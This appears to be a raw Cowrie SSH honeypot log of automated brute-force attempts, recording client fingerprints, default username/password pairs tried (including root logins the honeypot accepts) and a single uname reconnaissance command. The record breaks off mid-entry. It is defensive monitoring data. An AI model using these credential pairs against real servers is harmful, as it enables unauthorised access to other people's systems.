{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:47.828426Z","src_ip":"212.227.125.160","session":"170b218e1c49"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"123456","message":"login attempt [gitlab-runner/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:48.105028Z","src_ip":"212.227.125.160","session":"170b218e1c49"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:49.237455Z","src_ip":"212.227.125.160","session":"170b218e1c49"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":42844,"dst_ip":"1.2.3.4","dst_port":22,"session":"a612c357ec45","protocol":"ssh","message":"New connection: 83.168.105.65:42844 (1.2.3.4:22) [session: a612c357ec45]","sensor":"my-vps","timestamp":"2025-08-26T11:32:52.036499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:52.037408Z","src_ip":"83.168.105.65","session":"a612c357ec45"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:52.074499Z","src_ip":"83.168.105.65","session":"a612c357ec45"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:32:52.187943Z","src_ip":"83.168.105.65","session":"a612c357ec45"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:32:52.320295Z","src_ip":"83.168.105.65","session":"a612c357ec45"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:32:52.320991Z","src_ip":"83.168.105.65","session":"a612c357ec45"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:52.359164Z","src_ip":"83.168.105.65","session":"a612c357ec45"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:52.360100Z","src_ip":"83.168.105.65","session":"a612c357ec45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52184,"dst_ip":"1.2.3.4","dst_port":22,"session":"04a8b0e2ffe3","protocol":"ssh","message":"New connection: 212.227.125.160:52184 (1.2.3.4:22) [session: 04a8b0e2ffe3]","sensor":"my-vps","timestamp":"2025-08-26T11:32:53.718935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:53.719892Z","src_ip":"212.227.125.160","session":"04a8b0e2ffe3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:53.773358Z","src_ip":"212.227.125.160","session":"04a8b0e2ffe3"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:32:53.964132Z","src_ip":"212.227.125.160","session":"04a8b0e2ffe3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:32:54.085196Z","src_ip":"212.227.125.160","session":"04a8b0e2ffe3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:32:54.085877Z","src_ip":"212.227.125.160","session":"04a8b0e2ffe3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:54.143865Z","src_ip":"212.227.125.160","session":"04a8b0e2ffe3"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:32:54.144995Z","src_ip":"212.227.125.160","session":"04a8b0e2ffe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52952,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a083ca94314","protocol":"ssh","message":"New connection: 212.227.125.160:52952 (1.2.3.4:22) [session: 6a083ca94314]","sensor":"my-vps","timestamp":"2025-08-26T11:32:59.338953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:32:59.479969Z","src_ip":"212.227.125.160","session":"6a083ca94314"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:32:59.480928Z","src_ip":"212.227.125.160","session":"6a083ca94314"}
{"eventid":"cowrie.login.failed","username":"fastmail","password":"fastmail","message":"login attempt [fastmail/fastmail] failed","sensor":"my-vps","timestamp":"2025-08-26T11:32:59.770390Z","src_ip":"212.227.125.160","session":"6a083ca94314"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:00.824977Z","src_ip":"212.227.125.160","session":"6a083ca94314"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53722,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3397595632a","protocol":"ssh","message":"New connection: 212.227.125.160:53722 (1.2.3.4:22) [session: d3397595632a]","sensor":"my-vps","timestamp":"2025-08-26T11:33:05.115028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:05.116049Z","src_ip":"212.227.125.160","session":"d3397595632a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:05.168413Z","src_ip":"212.227.125.160","session":"d3397595632a"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:05.359410Z","src_ip":"212.227.125.160","session":"d3397595632a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:06.411340Z","src_ip":"212.227.125.160","session":"d3397595632a"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33988,"dst_ip":"1.2.3.4","dst_port":22,"session":"4957e764c2fa","protocol":"ssh","message":"New connection: 83.168.105.65:33988 (1.2.3.4:22) [session: 4957e764c2fa]","sensor":"my-vps","timestamp":"2025-08-26T11:33:07.567404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:07.568065Z","src_ip":"83.168.105.65","session":"4957e764c2fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:07.607616Z","src_ip":"83.168.105.65","session":"4957e764c2fa"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:07.727791Z","src_ip":"83.168.105.65","session":"4957e764c2fa"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:08.770066Z","src_ip":"83.168.105.65","session":"4957e764c2fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54492,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3307ebe53c8","protocol":"ssh","message":"New connection: 212.227.125.160:54492 (1.2.3.4:22) [session: f3307ebe53c8]","sensor":"my-vps","timestamp":"2025-08-26T11:33:10.865040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:10.865946Z","src_ip":"212.227.125.160","session":"f3307ebe53c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:10.916373Z","src_ip":"212.227.125.160","session":"f3307ebe53c8"}
{"eventid":"cowrie.login.failed","username":"pfd","password":"pfd","message":"login attempt [pfd/pfd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:11.071466Z","src_ip":"212.227.125.160","session":"f3307ebe53c8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:12.123033Z","src_ip":"212.227.125.160","session":"f3307ebe53c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55262,"dst_ip":"1.2.3.4","dst_port":22,"session":"65f2a8303631","protocol":"ssh","message":"New connection: 212.227.125.160:55262 (1.2.3.4:22) [session: 65f2a8303631]","sensor":"my-vps","timestamp":"2025-08-26T11:33:16.320700Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:16.321381Z","src_ip":"212.227.125.160","session":"65f2a8303631"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:33:16.374554Z","src_ip":"212.227.125.160","session":"65f2a8303631"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:16.532139Z","src_ip":"212.227.125.160","session":"65f2a8303631"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:17.765190Z","src_ip":"212.227.125.160","session":"65f2a8303631"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42322,"dst_ip":"1.2.3.4","dst_port":22,"session":"b981358e8fe3","protocol":"ssh","message":"New connection: 212.227.125.160:42322 (1.2.3.4:22) [session: b981358e8fe3]","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.540369Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42350,"dst_ip":"1.2.3.4","dst_port":22,"session":"192394398d71","protocol":"ssh","message":"New connection: 212.227.125.160:42350 (1.2.3.4:22) [session: 192394398d71]","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.541351Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42368,"dst_ip":"1.2.3.4","dst_port":22,"session":"6432bcc20a87","protocol":"ssh","message":"New connection: 212.227.125.160:42368 (1.2.3.4:22) [session: 6432bcc20a87]","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.542067Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42356,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4e43d52e235","protocol":"ssh","message":"New connection: 212.227.125.160:42356 (1.2.3.4:22) [session: e4e43d52e235]","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.543017Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42374,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5776a1eaa4f","protocol":"ssh","message":"New connection: 212.227.125.160:42374 (1.2.3.4:22) [session: d5776a1eaa4f]","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.543783Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42358,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a88c3dc3d2f","protocol":"ssh","message":"New connection: 212.227.125.160:42358 (1.2.3.4:22) [session: 5a88c3dc3d2f]","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.544408Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42336,"dst_ip":"1.2.3.4","dst_port":22,"session":"45d207910ecb","protocol":"ssh","message":"New connection: 212.227.125.160:42336 (1.2.3.4:22) [session: 45d207910ecb]","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.545256Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42380,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ded23236e57","protocol":"ssh","message":"New connection: 212.227.125.160:42380 (1.2.3.4:22) [session: 1ded23236e57]","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.545720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:20.591616Z","src_ip":"212.227.125.160","session":"192394398d71"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-